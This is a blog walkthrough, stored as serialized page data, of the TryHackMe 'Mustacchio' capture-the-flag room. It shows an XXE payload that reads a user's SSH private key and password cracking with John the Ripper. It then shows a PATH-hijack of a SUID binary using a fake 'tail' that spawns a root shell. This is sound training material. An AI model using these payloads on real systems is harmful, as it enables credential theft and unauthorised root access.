[{"data":1,"prerenderedAt":1084},["ShallowReactive",2],{"\u002F2025\u002Ftryhackme-mustacchio-writeup":3,"surround-\u002F2025\u002Ftryhackme-mustacchio-writeup":1075},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":14,"draft":6,"readingTime":15,"body":20,"_type":1068,"_id":1069,"_source":1070,"_file":1071,"_stem":1072,"_extension":1073,"_original_dir":1074},"\u002F2025\u002Ftryhackme-mustacchio-writeup","2025",false,"","TryHackMe - Mustacchio","A step-by-step walkthrough for the TryHackMe 'Mustacchio' room. This guide covers initial access via XXE injection and privilege escalation to root by exploiting a SUID binary with a PATH hijacking vulnerability.","2025-08-29T13:33:15.000Z","https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002Fthumbnail.jpg",[13],"CTF",true,{"text":16,"minutes":17,"time":18,"words":19},"4 min read",3.645,218700,729,{"type":21,"children":22,"toc":1063},"root",[23,29,45,52,56,78,82,86,91,95,111,115,129,133,154,158,171,175,179,184,188,194,230,259,285,573,634,655,677,681,693,697,710,715,773,779,800,805,809,838,842,846,850,886,890,939,1012,1053,1057],{"type":24,"tag":25,"props":26,"children":28},"element","pic",{"src":27},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F1.jpg",[],{"type":24,"tag":30,"props":31,"children":32},"p",{},[33,36],{"type":34,"value":35},"text","Target IP: ",{"type":24,"tag":37,"props":38,"children":42},"a",{"href":39,"rel":40},"https:\u002F\u002Ftryhackme.com\u002Froom\u002Fmustacchio",[41],"nofollow",[43],{"type":34,"value":44},"10.10.109.12",{"type":24,"tag":46,"props":47,"children":49},"h2",{"id":48},"reconnaissance",[50],{"type":34,"value":51},"Reconnaissance",{"type":24,"tag":25,"props":53,"children":55},{"src":54},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F2.jpg",[],{"type":24,"tag":30,"props":57,"children":58},{},[59,61,68,70,76],{"type":34,"value":60},"We found one ",{"type":24,"tag":62,"props":63,"children":65},"code",{"className":64},[],[66],{"type":34,"value":67},"ssh",{"type":34,"value":69}," server and two ",{"type":24,"tag":62,"props":71,"children":73},{"className":72},[],[74],{"type":34,"value":75},"web",{"type":34,"value":77}," servers. Let's check them out.",{"type":24,"tag":25,"props":79,"children":81},{"src":80},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F3.jpg",[],{"type":24,"tag":25,"props":83,"children":85},{"src":84},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F4.jpg",[],{"type":24,"tag":30,"props":87,"children":88},{},[89],{"type":34,"value":90},"As we can see, one server hosts a normal page, and the other has an admin login panel.\nNow, let's perform a directory scan on the main site to see what we can find.",{"type":24,"tag":25,"props":92,"children":94},{"src":93},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F5.jpg",[],{"type":24,"tag":30,"props":96,"children":97},{},[98,100,109],{"type":34,"value":99},"And we found a non-standard directory named ",{"type":24,"tag":62,"props":101,"children":106},{"className":102,"id":104,"style":105},[103],"example-info","just-like-this","color: #efb11d",[107],{"type":34,"value":108},"\u002Fcustom",{"type":34,"value":110}," . Let's investigate it.",{"type":24,"tag":25,"props":112,"children":114},{"src":113},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F6.jpg",[],{"type":24,"tag":30,"props":116,"children":117},{},[118,120,127],{"type":34,"value":119},"Here, the ",{"type":24,"tag":62,"props":121,"children":124},{"className":122,"id":104,"style":123},[103],"color: #4DFFBE",[125],{"type":34,"value":126},"users.bak",{"type":34,"value":128}," file catches our attention. Let's download it to our machine and check it; it might contain something valuable.",{"type":24,"tag":25,"props":130,"children":132},{"src":131},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F7.jpg",[],{"type":24,"tag":30,"props":134,"children":135},{},[136,138,144,146,152],{"type":34,"value":137},"Upon inspection, we see that it's an SQLite database. When we examine it, we find the username ",{"type":24,"tag":62,"props":139,"children":141},{"className":140},[],[142],{"type":34,"value":143},"admin",{"type":34,"value":145}," and a hash. Let's try to crack this hash using ",{"type":24,"tag":37,"props":147,"children":150},{"href":148,"rel":149},"https:\u002F\u002Fcrackstation.net\u002F",[41],[151],{"type":34,"value":148},{"type":34,"value":153},".",{"type":24,"tag":25,"props":155,"children":157},{"src":156},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F8.jpg",[],{"type":24,"tag":30,"props":159,"children":160},{},[161,163,169],{"type":34,"value":162},"Our hash is cracked, and we've obtained the credentials ",{"type":24,"tag":62,"props":164,"children":166},{"className":165,"id":104,"style":123},[103],[167],{"type":34,"value":168},"admin:bulldog19",{"type":34,"value":170},". Now, let's try to log into the admin page we found with these credentials.",{"type":24,"tag":25,"props":172,"children":174},{"src":173},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F9.jpg",[],{"type":24,"tag":25,"props":176,"children":178},{"src":177},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F10.jpg",[],{"type":24,"tag":30,"props":180,"children":181},{},[182],{"type":34,"value":183},"And we were able to log in. Now, we are presented with a comment submission form and nothing else. Perhaps there's something in the source code; let's examine the page's source.",{"type":24,"tag":25,"props":185,"children":187},{"src":186},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F11.jpg",[],{"type":24,"tag":46,"props":189,"children":191},{"id":190},"initial-access",[192],{"type":34,"value":193},"Initial Access",{"type":24,"tag":30,"props":195,"children":196},{},[197,199,205,207,212,214,220,222,228],{"type":34,"value":198},"From the source code, we discover the username ",{"type":24,"tag":62,"props":200,"children":202},{"className":201,"id":104,"style":123},[103],[203],{"type":34,"value":204},"barry",{"type":34,"value":206}," and learn that this user has an ",{"type":24,"tag":62,"props":208,"children":210},{"className":209,"id":104,"style":123},[103],[211],{"type":34,"value":67},{"type":34,"value":213}," key. We also see that the comment section expects data in ",{"type":24,"tag":62,"props":215,"children":217},{"className":216,"id":104,"style":123},[103],[218],{"type":34,"value":219},"XML",{"type":34,"value":221}," format. This immediately suggests an ",{"type":24,"tag":62,"props":223,"children":225},{"className":224},[],[226],{"type":34,"value":227},"XXE (XML External Entity) Injection",{"type":34,"value":229}," attack.",{"type":24,"tag":231,"props":232,"children":234},"alert",{"type":233},"caution",[235,244],{"type":24,"tag":236,"props":237,"children":238},"template",{"v-slot:title":7},[239],{"type":24,"tag":30,"props":240,"children":241},{},[242],{"type":34,"value":243},"How Does XXE Work?",{"type":24,"tag":30,"props":245,"children":246},{},[247,249,257],{"type":34,"value":248},"The XML standard allows for the definition of variables called ",{"type":24,"tag":250,"props":251,"children":254},"span",{"className":252,"id":104,"style":253},[103],"color: #EA5B6F",[255],{"type":34,"value":256},"entities.",{"type":34,"value":258}," These entities can load data from external sources (e.g., a file on the system or a URL). If the XML parser on the server is insecurely configured to process these external entities, we can exploit it.",{"type":24,"tag":30,"props":260,"children":261},{},[262,264,269,271,276,278,284],{"type":34,"value":263},"We know that the user ",{"type":24,"tag":62,"props":265,"children":267},{"className":266},[],[268],{"type":34,"value":204},{"type":34,"value":270}," has an SSH key. Therefore, if we can load a file using the XXE vulnerability, we'll load this ",{"type":24,"tag":62,"props":272,"children":274},{"className":273},[],[275],{"type":34,"value":67},{"type":34,"value":277}," file. We can do this with the following XML structure. By default, an SSH private key is located at ",{"type":24,"tag":62,"props":279,"children":281},{"className":280,"id":104,"style":105},[103],[282],{"type":34,"value":283},"\u002Fhome\u002Fusername\u002F.ssh\u002Fid_rsa",{"type":34,"value":153},{"type":24,"tag":286,"props":287,"children":291},"pre",{"className":288,"code":289,"language":290,"meta":7,"style":7},"language-xml shiki shiki-themes catppuccin-latte one-dark-pro","\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE comment [\n  \u003C!ENTITY xxe SYSTEM \"file:\u002F\u002F\u002Fhome\u002Fbarry\u002F.ssh\u002Fid_rsa\">\n]>\n\u003Ccomment>\n  \u003Cname>test\u003C\u002Fname>\n  \u003Cauthor>test\u003C\u002Fauthor>\n  \u003Ccom>&xxe;\u003C\u002Fcom>\n\u003C\u002Fcomment>\n","xml",[292],{"type":24,"tag":62,"props":293,"children":294},{"__ignoreMap":7},[295,348,376,410,423,441,478,511,557],{"type":24,"tag":250,"props":296,"children":299},{"class":297,"line":298},"line",1,[300,306,311,317,323,329,334,338,343],{"type":24,"tag":250,"props":301,"children":303},{"style":302},"--shiki-default:#179299;--shiki-dark:#ABB2BF",[304],{"type":34,"value":305},"\u003C?",{"type":24,"tag":250,"props":307,"children":309},{"style":308},"--shiki-default:#1E66F5;--shiki-dark:#E06C75",[310],{"type":34,"value":290},{"type":24,"tag":250,"props":312,"children":314},{"style":313},"--shiki-default:#DF8E1D;--shiki-dark:#D19A66",[315],{"type":34,"value":316}," version",{"type":24,"tag":250,"props":318,"children":320},{"style":319},"--shiki-default:#4C4F69;--shiki-dark:#ABB2BF",[321],{"type":34,"value":322},"=",{"type":24,"tag":250,"props":324,"children":326},{"style":325},"--shiki-default:#40A02B;--shiki-dark:#98C379",[327],{"type":34,"value":328},"\"1.0\"",{"type":24,"tag":250,"props":330,"children":331},{"style":313},[332],{"type":34,"value":333}," encoding",{"type":24,"tag":250,"props":335,"children":336},{"style":319},[337],{"type":34,"value":322},{"type":24,"tag":250,"props":339,"children":340},{"style":325},[341],{"type":34,"value":342},"\"UTF-8\"",{"type":24,"tag":250,"props":344,"children":345},{"style":302},[346],{"type":34,"value":347},"?>\n",{"type":24,"tag":250,"props":349,"children":351},{"class":297,"line":350},2,[352,358,364,370],{"type":24,"tag":250,"props":353,"children":355},{"style":354},"--shiki-default:#8839EF;--shiki-dark:#ABB2BF",[356],{"type":34,"value":357},"\u003C!",{"type":24,"tag":250,"props":359,"children":361},{"style":360},"--shiki-default:#8839EF;--shiki-dark:#C678DD",[362],{"type":34,"value":363},"DOCTYPE",{"type":24,"tag":250,"props":365,"children":367},{"style":366},"--shiki-default:#4C4F69;--shiki-dark:#E5C07B",[368],{"type":34,"value":369}," comment",{"type":24,"tag":250,"props":371,"children":373},{"style":372},"--shiki-default:#7C7F93;--shiki-dark:#D19A66",[374],{"type":34,"value":375}," [\n",{"type":24,"tag":250,"props":377,"children":379},{"class":297,"line":378},3,[380,385,390,395,400,405],{"type":24,"tag":250,"props":381,"children":382},{"style":354},[383],{"type":34,"value":384},"  \u003C!",{"type":24,"tag":250,"props":386,"children":387},{"style":360},[388],{"type":34,"value":389},"ENTITY",{"type":24,"tag":250,"props":391,"children":392},{"style":366},[393],{"type":34,"value":394}," xxe",{"type":24,"tag":250,"props":396,"children":397},{"style":360},[398],{"type":34,"value":399}," SYSTEM ",{"type":24,"tag":250,"props":401,"children":402},{"style":325},[403],{"type":34,"value":404},"\"file:\u002F\u002F\u002Fhome\u002Fbarry\u002F.ssh\u002Fid_rsa\"",{"type":24,"tag":250,"props":406,"children":407},{"style":354},[408],{"type":34,"value":409},">\n",{"type":24,"tag":250,"props":411,"children":413},{"class":297,"line":412},4,[414,419],{"type":24,"tag":250,"props":415,"children":416},{"style":372},[417],{"type":34,"value":418},"]",{"type":24,"tag":250,"props":420,"children":421},{"style":354},[422],{"type":34,"value":409},{"type":24,"tag":250,"props":424,"children":426},{"class":297,"line":425},5,[427,432,437],{"type":24,"tag":250,"props":428,"children":429},{"style":302},[430],{"type":34,"value":431},"\u003C",{"type":24,"tag":250,"props":433,"children":434},{"style":308},[435],{"type":34,"value":436},"comment",{"type":24,"tag":250,"props":438,"children":439},{"style":302},[440],{"type":34,"value":409},{"type":24,"tag":250,"props":442,"children":444},{"class":297,"line":443},6,[445,450,455,460,465,470,474],{"type":24,"tag":250,"props":446,"children":447},{"style":302},[448],{"type":34,"value":449},"  \u003C",{"type":24,"tag":250,"props":451,"children":452},{"style":308},[453],{"type":34,"value":454},"name",{"type":24,"tag":250,"props":456,"children":457},{"style":302},[458],{"type":34,"value":459},">",{"type":24,"tag":250,"props":461,"children":462},{"style":319},[463],{"type":34,"value":464},"test",{"type":24,"tag":250,"props":466,"children":467},{"style":302},[468],{"type":34,"value":469},"\u003C\u002F",{"type":24,"tag":250,"props":471,"children":472},{"style":308},[473],{"type":34,"value":454},{"type":24,"tag":250,"props":475,"children":476},{"style":302},[477],{"type":34,"value":409},{"type":24,"tag":250,"props":479,"children":481},{"class":297,"line":480},7,[482,486,491,495,499,503,507],{"type":24,"tag":250,"props":483,"children":484},{"style":302},[485],{"type":34,"value":449},{"type":24,"tag":250,"props":487,"children":488},{"style":308},[489],{"type":34,"value":490},"author",{"type":24,"tag":250,"props":492,"children":493},{"style":302},[494],{"type":34,"value":459},{"type":24,"tag":250,"props":496,"children":497},{"style":319},[498],{"type":34,"value":464},{"type":24,"tag":250,"props":500,"children":501},{"style":302},[502],{"type":34,"value":469},{"type":24,"tag":250,"props":504,"children":505},{"style":308},[506],{"type":34,"value":490},{"type":24,"tag":250,"props":508,"children":509},{"style":302},[510],{"type":34,"value":409},{"type":24,"tag":250,"props":512,"children":514},{"class":297,"line":513},8,[515,519,524,528,534,540,545,549,553],{"type":24,"tag":250,"props":516,"children":517},{"style":302},[518],{"type":34,"value":449},{"type":24,"tag":250,"props":520,"children":521},{"style":308},[522],{"type":34,"value":523},"com",{"type":24,"tag":250,"props":525,"children":526},{"style":302},[527],{"type":34,"value":459},{"type":24,"tag":250,"props":529,"children":531},{"style":530},"--shiki-default:#D20F39;--shiki-dark:#D19A66",[532],{"type":34,"value":533},"&",{"type":24,"tag":250,"props":535,"children":537},{"style":536},"--shiki-default:#D20F39;--shiki-dark:#E06C75",[538],{"type":34,"value":539},"xxe",{"type":24,"tag":250,"props":541,"children":542},{"style":530},[543],{"type":34,"value":544},";",{"type":24,"tag":250,"props":546,"children":547},{"style":302},[548],{"type":34,"value":469},{"type":24,"tag":250,"props":550,"children":551},{"style":308},[552],{"type":34,"value":523},{"type":24,"tag":250,"props":554,"children":555},{"style":302},[556],{"type":34,"value":409},{"type":24,"tag":250,"props":558,"children":560},{"class":297,"line":559},9,[561,565,569],{"type":24,"tag":250,"props":562,"children":563},{"style":302},[564],{"type":34,"value":469},{"type":24,"tag":250,"props":566,"children":567},{"style":308},[568],{"type":34,"value":436},{"type":24,"tag":250,"props":570,"children":571},{"style":302},[572],{"type":34,"value":409},{"type":24,"tag":574,"props":575,"children":576},"ul",{},[577,596,614],{"type":24,"tag":578,"props":579,"children":580},"li",{},[581,588,590,595],{"type":24,"tag":62,"props":582,"children":585},{"className":583,"id":104,"style":584},[103],"color: #77BEF0",[586],{"type":34,"value":587},"\u003C!ENTITY xxe ...>",{"type":34,"value":589},": This command creates a special variable (entity) named ",{"type":24,"tag":62,"props":591,"children":593},{"className":592},[],[594],{"type":34,"value":539},{"type":34,"value":153},{"type":24,"tag":578,"props":597,"children":598},{},[599,605,607,612],{"type":24,"tag":62,"props":600,"children":602},{"className":601,"id":104,"style":584},[103],[603],{"type":34,"value":604},"SYSTEM \"file:\u002F\u002F\u002Fhome\u002Fbarry\u002F.ssh\u002Fid_rsa\"",{"type":34,"value":606},": This part specifies the value of the ",{"type":24,"tag":62,"props":608,"children":610},{"className":609},[],[611],{"type":34,"value":539},{"type":34,"value":613}," variable.",{"type":24,"tag":578,"props":615,"children":616},{},[617,619,624,626,632],{"type":34,"value":618},"The XML parser now knows that when it sees the word ",{"type":24,"tag":62,"props":620,"children":622},{"className":621},[],[623],{"type":34,"value":539},{"type":34,"value":625},", it refers to the content of the ",{"type":24,"tag":62,"props":627,"children":629},{"className":628,"id":104,"style":584},[103],[630],{"type":34,"value":631},"\u002Fhome\u002Fbarry\u002F.ssh\u002Fid_rsa",{"type":34,"value":633}," file.",{"type":24,"tag":30,"props":635,"children":636},{},[637,639,645,647,653],{"type":34,"value":638},"We then place ",{"type":24,"tag":62,"props":640,"children":642},{"className":641,"id":104,"style":123},[103],[643],{"type":34,"value":644},"&xxe;",{"type":34,"value":646}," inside the ",{"type":24,"tag":62,"props":648,"children":650},{"className":649},[],[651],{"type":34,"value":652},"\u003Ccom>",{"type":34,"value":654}," tag, making it appear as a normal part of the XML data. This will display the content of the file.",{"type":24,"tag":574,"props":656,"children":657},{},[658],{"type":24,"tag":578,"props":659,"children":660},{},[661,663,668,670,675],{"type":34,"value":662},"The ",{"type":24,"tag":62,"props":664,"children":666},{"className":665},[],[667],{"type":34,"value":533},{"type":34,"value":669}," and ",{"type":24,"tag":62,"props":671,"children":673},{"className":672},[],[674],{"type":34,"value":544},{"type":34,"value":676}," characters signal to the XML parser: \"I'm using a previously defined variable here.\"",{"type":24,"tag":25,"props":678,"children":680},{"src":679},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F12.jpg",[],{"type":24,"tag":30,"props":682,"children":683},{},[684,686,691],{"type":34,"value":685},"As you can see, we've obtained ",{"type":24,"tag":62,"props":687,"children":689},{"className":688},[],[690],{"type":34,"value":204},{"type":34,"value":692},"'s private key. To copy it correctly, let's open the browser's console and copy it from there.",{"type":24,"tag":25,"props":694,"children":696},{"src":695},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F13.jpg",[],{"type":24,"tag":30,"props":698,"children":699},{},[700,702,708],{"type":34,"value":701},"Let's save this key as ",{"type":24,"tag":62,"props":703,"children":705},{"className":704},[],[706],{"type":34,"value":707},"id_rsa",{"type":34,"value":709},". (Be careful to preserve the key's formatting. In my case, a leading space initially caused an issue.)",{"type":24,"tag":30,"props":711,"children":712},{},[713],{"type":34,"value":714},"Now, let's try to log in with this key. As indicated by the key's format and the SSH prompt for a password, the key is protected by a passphrase. Let's try to crack this passphrase with John the Ripper; it might be in our wordlist.",{"type":24,"tag":716,"props":717,"children":718},"ol",{},[719,732,748],{"type":24,"tag":578,"props":720,"children":721},{},[722,724,730],{"type":34,"value":723},"Use the command ",{"type":24,"tag":62,"props":725,"children":727},{"className":726},[],[728],{"type":34,"value":729},"ssh2john id_rsa > hash",{"type":34,"value":731}," to convert the key into a John-readable format.",{"type":24,"tag":578,"props":733,"children":734},{},[735,737,743,744],{"type":34,"value":736},"Now, crack the hash with ",{"type":24,"tag":62,"props":738,"children":740},{"className":739},[],[741],{"type":34,"value":742},"john hash --wordlist=\u002Fusr\u002Fshare\u002Fwordlists\u002Frockyou.txt",{"type":34,"value":153},{"type":24,"tag":25,"props":745,"children":747},{"src":746},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F14.jpg",[],{"type":24,"tag":578,"props":749,"children":750},{},[751,753,759,761,767,769],{"type":34,"value":752},"We found the password (",{"type":24,"tag":62,"props":754,"children":756},{"className":755,"id":104,"style":123},[103],[757],{"type":34,"value":758},"urieljames",{"type":34,"value":760},")! Now, let's set the correct permissions for our key with ",{"type":24,"tag":62,"props":762,"children":764},{"className":763},[],[765],{"type":34,"value":766},"chmod 600 id_rsa",{"type":34,"value":768}," and connect via SSH.",{"type":24,"tag":25,"props":770,"children":772},{"src":771},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F15.jpg",[],{"type":24,"tag":46,"props":774,"children":776},{"id":775},"privilege-escalation",[777],{"type":34,"value":778},"Privilege Escalation",{"type":24,"tag":30,"props":780,"children":781},{},[782,784,790,792,798],{"type":34,"value":783},"For privilege escalation, a manual analysis of the system reveals that the ",{"type":24,"tag":62,"props":785,"children":787},{"className":786,"id":104,"style":123},[103],[788],{"type":34,"value":789},"suid",{"type":34,"value":791}," bit is set for ",{"type":24,"tag":62,"props":793,"children":795},{"className":794,"id":104,"style":123},[103],[796],{"type":34,"value":797},"\u002Fhome\u002Fjoe\u002Flive_log",{"type":34,"value":799},". This means our user can run this file with the permissions of its owner (root).",{"type":24,"tag":801,"props":802,"children":804},"copy",{"code":803},"find \u002F -perm -4000 -type f -ls 2>\u002Fdev\u002Fnull",[],{"type":24,"tag":25,"props":806,"children":808},{"src":807},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F16.jpg",[],{"type":24,"tag":30,"props":810,"children":811},{},[812,814,820,822,828,830,836],{"type":34,"value":813},"Upon examining this file, we see that it fetches the site's logs in real-time from ",{"type":24,"tag":62,"props":815,"children":817},{"className":816},[],[818],{"type":34,"value":819},"access.log",{"type":34,"value":821}," using the command ",{"type":24,"tag":62,"props":823,"children":825},{"className":824,"id":104,"style":105},[103],[826],{"type":34,"value":827},"tail -f \u002Fvar\u002Flog\u002Fnginx\u002Faccess.log",{"type":34,"value":829},". (You can also use tools like ",{"type":24,"tag":62,"props":831,"children":833},{"className":832},[],[834],{"type":34,"value":835},"strings",{"type":34,"value":837}," to inspect it.)",{"type":24,"tag":25,"props":839,"children":841},{"src":840},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F17.jpg",[],{"type":24,"tag":25,"props":843,"children":845},{"src":844},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F18.jpg",[],{"type":24,"tag":25,"props":847,"children":849},{"src":848},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F19.jpg",[],{"type":24,"tag":30,"props":851,"children":852},{},[853,855,861,863,869,871,877,879,884],{"type":34,"value":854},"What catches our attention is that the program calls ",{"type":24,"tag":62,"props":856,"children":858},{"className":857},[],[859],{"type":34,"value":860},"tail",{"type":34,"value":862}," without specifying its full path (e.g., ",{"type":24,"tag":62,"props":864,"children":866},{"className":865},[],[867],{"type":34,"value":868},"\u002Fbin\u002Ftail",{"type":34,"value":870},"). This is the vulnerability we will exploit.\nWhen the path to an executable is not specified, the system searches the directories listed in the ",{"type":24,"tag":62,"props":872,"children":874},{"className":873,"id":104,"style":123},[103],[875],{"type":34,"value":876},"$PATH",{"type":34,"value":878}," variable. In our case, the program runs, meaning ",{"type":24,"tag":62,"props":880,"children":882},{"className":881},[],[883],{"type":34,"value":860},{"type":34,"value":885}," is in one of those directories. We can exploit this behavior. But how?",{"type":24,"tag":25,"props":887,"children":889},{"src":888},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F22.jpg",[],{"type":24,"tag":30,"props":891,"children":892},{},[893,895,900,902,908,910,915,917,922,924,930,932,937],{"type":34,"value":894},"The system checks the directories in ",{"type":24,"tag":62,"props":896,"children":898},{"className":897,"id":104,"style":105},[103],[899],{"type":34,"value":876},{"type":34,"value":901}," ",{"type":24,"tag":250,"props":903,"children":905},{"className":904,"id":104,"style":105},[103],[906],{"type":34,"value":907},"in order",{"type":34,"value":909},". This allows us to add a directory containing a malicious ",{"type":24,"tag":62,"props":911,"children":913},{"className":912},[],[914],{"type":34,"value":860},{"type":34,"value":916}," executable file to the beginning of the ",{"type":24,"tag":62,"props":918,"children":920},{"className":919},[],[921],{"type":34,"value":876},{"type":34,"value":923}," variable. When ",{"type":24,"tag":62,"props":925,"children":927},{"className":926},[],[928],{"type":34,"value":929},"live_log",{"type":34,"value":931}," is run, it first finds and executes the fake ",{"type":24,"tag":62,"props":933,"children":935},{"className":934},[],[936],{"type":34,"value":860},{"type":34,"value":938}," file instead of the real one. Let's see how to do this step by step:",{"type":24,"tag":716,"props":940,"children":941},{},[942,981],{"type":24,"tag":578,"props":943,"children":944},{},[945,947,952,954,960,962,968,970,976,977],{"type":34,"value":946},"First, create a simple fake ",{"type":24,"tag":62,"props":948,"children":950},{"className":949},[],[951],{"type":34,"value":860},{"type":34,"value":953}," file in the ",{"type":24,"tag":62,"props":955,"children":957},{"className":956},[],[958],{"type":34,"value":959},"\u002Ftmp",{"type":34,"value":961}," directory with the command ",{"type":24,"tag":62,"props":963,"children":965},{"className":964,"id":104,"style":584},[103],[966],{"type":34,"value":967},"echo '\u002Fbin\u002Fbash' > \u002Ftmp\u002Ftail",{"type":34,"value":969},":. Make it executable with ",{"type":24,"tag":62,"props":971,"children":973},{"className":972},[],[974],{"type":34,"value":975},"chmod +x \u002Ftmp\u002Ftail",{"type":34,"value":153},{"type":24,"tag":25,"props":978,"children":980},{"src":979},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F20.jpg",[],{"type":24,"tag":578,"props":982,"children":983},{},[984,986,991,993,998,1000,1006,1008],{"type":34,"value":985},"Prepend the ",{"type":24,"tag":62,"props":987,"children":989},{"className":988},[],[990],{"type":34,"value":959},{"type":34,"value":992}," directory to our ",{"type":24,"tag":62,"props":994,"children":996},{"className":995},[],[997],{"type":34,"value":876},{"type":34,"value":999}," variable: ",{"type":24,"tag":62,"props":1001,"children":1003},{"className":1002,"id":104,"style":584},[103],[1004],{"type":34,"value":1005},"export PATH=\u002Ftmp:$PATH",{"type":34,"value":1007},":.",{"type":24,"tag":25,"props":1009,"children":1011},{"src":1010},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F21.jpg",[],{"type":24,"tag":30,"props":1013,"children":1014},{},[1015,1017,1022,1024,1029,1031,1036,1038,1043,1045,1051],{"type":34,"value":1016},"Now, run the ",{"type":24,"tag":62,"props":1018,"children":1020},{"className":1019},[],[1021],{"type":34,"value":929},{"type":34,"value":1023}," program. Since it has the ",{"type":24,"tag":62,"props":1025,"children":1027},{"className":1026},[],[1028],{"type":34,"value":789},{"type":34,"value":1030}," bit set and is owned by ",{"type":24,"tag":62,"props":1032,"children":1034},{"className":1033},[],[1035],{"type":34,"value":21},{"type":34,"value":1037},", it will run with root privileges. When it tries to execute ",{"type":24,"tag":62,"props":1039,"children":1041},{"className":1040},[],[1042],{"type":34,"value":860},{"type":34,"value":1044},", it will run our malicious script, which is configured to spawn a ",{"type":24,"tag":62,"props":1046,"children":1048},{"className":1047},[],[1049],{"type":34,"value":1050},"\u002Fbin\u002Fbash",{"type":34,"value":1052}," shell. This will grant us a new shell with root privileges.",{"type":24,"tag":25,"props":1054,"children":1056},{"src":1055},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-mustacchio-writeup\u002F23.jpg",[],{"type":24,"tag":1058,"props":1059,"children":1060},"style",{},[1061],{"type":34,"value":1062},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":412,"depth":412,"links":1064},[1065,1066,1067],{"id":48,"depth":350,"text":51},{"id":190,"depth":350,"text":193},{"id":775,"depth":350,"text":778},"markdown","content:posts:2025:tryhackme-mustacchio-writeup.md","content","posts\u002F2025\u002Ftryhackme-mustacchio-writeup.md","posts\u002F2025\u002Ftryhackme-mustacchio-writeup","md","\u002Fposts",[1076,1080],{"_path":1077,"title":1078,"date":1079},"\u002F2025\u002Ftryhackme-chillhack-writeup","TryHackMe - Chill Hack","2025-08-28T11:03:29.000Z",{"_path":1081,"title":1082,"date":1083},"\u002F2025\u002Ftryhackme-lianyu-writeup","TryHackMe - Lian Yu","2025-09-01T14:54:37.000Z",1776934250795]